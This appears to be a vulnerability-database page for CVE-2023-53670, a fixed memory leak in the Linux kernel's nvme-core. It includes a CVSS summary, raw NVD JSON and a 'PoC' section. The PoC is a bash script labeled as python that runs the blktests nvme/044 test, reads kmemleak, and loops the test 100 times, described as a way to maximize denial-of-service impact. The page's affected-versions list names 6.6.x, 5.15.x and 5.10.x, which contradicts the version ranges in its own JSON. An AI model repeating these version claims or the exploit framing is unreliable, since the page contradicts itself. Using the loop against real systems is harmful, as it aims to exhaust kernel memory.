CVE-2023-53670

Description

In the Linux kernel, the following vulnerability has been resolved: nvme-core: fix dev_pm_qos memleak Call dev_pm_qos_hide_latency_tolerance() in the error unwind patch to avoid following kmemleak:- blktests (master) # kmemleak-clear; ./check nvme/044; blktests (master) # kmemleak-scan ; kmemleak-show nvme/044 (Test bi-directional authentication) [passed] runtime 2.111s ... 2.124s unreferenced object 0xffff888110c46240 (size 96): comm "nvme", pid 33461, jiffies 4345365353 (age 75.586s) hex dump (first 32 bytes): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ backtrace: [<0000000069ac2cec>] kmalloc_trace+0x25/0x90 [<000000006acc66d5>] dev_pm_qos_update_user_latency_tolerance+0x6f/0x100 [<00000000cc376ea7>] nvme_init_ctrl+0x38e/0x410 [nvme_core] [<000000007df61b4b>] 0xffffffffc05e88b3 [<00000000d152b985>] 0xffffffffc05744cb [<00000000f04a4041>] vfs_write+0xc5/0x3c0 [<00000000f9491baf>] ksys_write+0x5f/0xe0 [<000000001c46513d>] do_syscall_64+0x3b/0x90 [<00000000ecf348fe>] entry_SYSCALL_64_after_hwframe+0x72/0xdc

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

Linux Kernel < 6.6 (包含nvme_core模块的版本)

Linux Kernel 6.6.x (受影响的稳定版本)

Linux Kernel 6.1.x (LTS受影响的稳定版本)

Linux Kernel 5.15.x (LTS受影响的稳定版本)

Linux Kernel 5.10.x (LTS受影响的稳定版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# CVE-2023-53670 PoC - Trigger nvme-core dev_pm_qos memory leak
# This PoC triggers the memory leak by running nvme/044 test from blktests

# Step 1: Clear existing kmemleak records
# Requires root privileges and CONFIG_DEBUG_KMEMLEAK enabled
echo "Clearing kmemleak records..."
echo clear > /sys/kernel/debug/kmemleak 2>/dev/null || echo "kmemleak not available"

# Step 2: Run the nvme/044 test which triggers bidirectional authentication
# This test triggers nvme_init_ctrl() which allocates PM QoS memory
echo "Running nvme/044 test to trigger memory leak..."
cd /path/to/blktests
./check nvme/044

# Step 3: Scan and display kmemleak findings
echo "Scanning for memory leaks..."
echo scan > /sys/kernel/debug/kmemleak 2>/dev/null
sleep 5
echo "Displaying leak information:"
cat /sys/kernel/debug/kmemleak 2>/dev/null

# Expected output includes:
# unreferenced object 0xffff888110c46240 (size 96):
#   comm "nvme", pid 33461, jiffies 4345365353 (age 75.586s)
#   backtrace:
#     [<0000000069ac2cec>] kmalloc_trace+0x25/0x90
#     [<000000006acc66d5>] dev_pm_qos_update_user_latency_tolerance+0x6f/0x100
#     [<00000000cc376ea7>] nvme_init_ctrl+0x38e/0x410 [nvme_core]

# To maximize impact (DoS), repeat the trigger multiple times:
for i in $(seq 1 100); do
    ./check nvme/044 > /dev/null 2>&1
    echo "Iteration $i completed"
done

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2023-53670
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2023-53670
[3] CVE Details https://www.cvedetails.com/cve/CVE-2023-53670/
[4] VulDB https://vuldb.com/cve/CVE-2023-53670
[5] https://git.kernel.org/stable/c/2ed9a89192e3192e5fea7ff6475c8722513f325e
[6] https://git.kernel.org/stable/c/7237c26431cc78e5ec3259f4350f3dd58f6a4319
[7] https://git.kernel.org/stable/c/7ed5cf8e6d9bfb6a78d0471317edff14f0f2b4dd
[8] https://git.kernel.org/stable/c/e1379e067b9485e5af03399fe3f0d39bccb023ad

Raw JSON Data

JSON

{"cve": {"id": "CVE-2023-53670", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:50.880", "lastModified": "2026-02-26T23:14:36.277", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme-core: fix dev_pm_qos memleak\n\nCall dev_pm_qos_hide_latency_tolerance() in the error unwind patch to\navoid following kmemleak:-\n\nblktests (master) # kmemleak-clear; ./check nvme/044;\nblktests (master) # kmemleak-scan ; kmemleak-show\nnvme/044 (Test bi-directional authentication) [passed]\n runtime 2.111s ... 2.124s\nunreferenced object 0xffff888110c46240 (size 96):\n comm \"nvme\", pid 33461, jiffies 4345365353 (age 75.586s)\n hex dump (first 32 bytes):\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n backtrace:\n [<0000000069ac2cec>] kmalloc_trace+0x25/0x90\n [<000000006acc66d5>] dev_pm_qos_update_user_latency_tolerance+0x6f/0x100\n [<00000000cc376ea7>] nvme_init_ctrl+0x38e/0x410 [nvme_core]\n [<000000007df61b4b>] 0xffffffffc05e88b3\n [<00000000d152b985>] 0xffffffffc05744cb\n [<00000000f04a4041>] vfs_write+0xc5/0x3c0\n [<00000000f9491baf>] ksys_write+0x5f/0xe0\n [<000000001c46513d>] do_syscall_64+0x3b/0x90\n [<00000000ecf348fe>] entry_SYSCALL_64_after_hwframe+0x72/0xdc"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndExcluding": "6.1.39", "matchCriteriaId": "2E917A06-FDC2-4FF3-8F1B-D994FC7AAA16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.3.13", "matchCriteriaId": "95CB4836-7F5D-4C20-B025-8E046EC87B78"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.4", "versionEndExcluding": "6.4.4", "matchCriteriaId": "6AB81046-CB69-4115-924C-963B37C41385"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/2ed9a89192e3192e5fea7ff6475c8722513f325e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7237c26431cc78e5ec3259f4350f3dd58f6a4319", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7ed5cf8e6d9bfb6a78d0471317edff14f0f2b4dd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e1379e067b9485e5af03399fe3f0d39bccb023ad", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}